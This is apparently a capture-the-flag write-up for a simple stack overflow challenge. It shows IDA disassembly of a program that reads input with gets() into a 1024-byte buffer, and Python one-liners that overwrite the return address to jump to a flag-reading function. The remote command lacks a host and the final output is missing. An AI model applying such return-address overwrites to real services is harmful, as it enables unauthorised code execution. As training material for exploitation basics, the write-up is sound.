
A vulnerable service is running here:

nc 5777

You have the binary of the service. Analyze it, find a vulnerability, and then exploit the server to get the flag!


What happens if you input a veeeeeeeeeery long string?


Based on the name of this challenge and the hint, this appears to be a stackoverflow. I opened this up in IDA and saw the main function code:

var_410= qword ptr -410h
var_404= dword ptr -404h
s= byte ptr -400h

push    rbp
mov     rbp, rsp
sub     rsp, 410h
mov     [rbp+var_404], edi
mov     [rbp+var_410], rsi
lea     rdi, s          ; "Input, please! >>----------> "
call    _puts
mov     rax, cs:__bss_start
mov     rdi, rax        ; stream
call    _fflush
lea     rax, [rbp+s]
mov     rdi, rax
mov     eax, 0
call    _gets
lea     rax, [rbp+s]
mov     rdi, rax        ; s
call    _puts
mov     eax, 0
main endp

There is also a function called flag in the binary, which reads a file called flag.txt:

push    rbp
mov     rbp, rsp
sub     rsp, 410h
lea     rsi, modes      ; "r"
lea     rdi, filename   ; "flag.txt"
call    _fopen

So our goal is to get this function called. Locally I created a flag.txt and then started hacking on the assembly. The address for the flag function is 0x0000000000400676. Knowing that this is a 64-bit assembly is important to make sure we put the full address into the payload.

Looking at the main assembly, I see that s is allocated 0x400 or 1024 bytes. So I created a text file using a python script and decided to try and completely smash the stack:

python -c "print '\x76\x06\x40\x00\x00\x00\x00\x00'*200" > payload.txt

I piped the output of my payload to the local binary and got the contents of my flag.txt:

cat payload.txt | ./stack

So then I tried with netcat and got the result:


*Note: After talking with others on this solution, a more targeted python script to overwrite a single instruction would be:

python -c "print 'a'*1032 + '\x76\x06\x40\x00\x00\x00\x00\x00'" > payload.txt

The extra 8 bytes move us far enough down the stack to overwrite the return address for the function.

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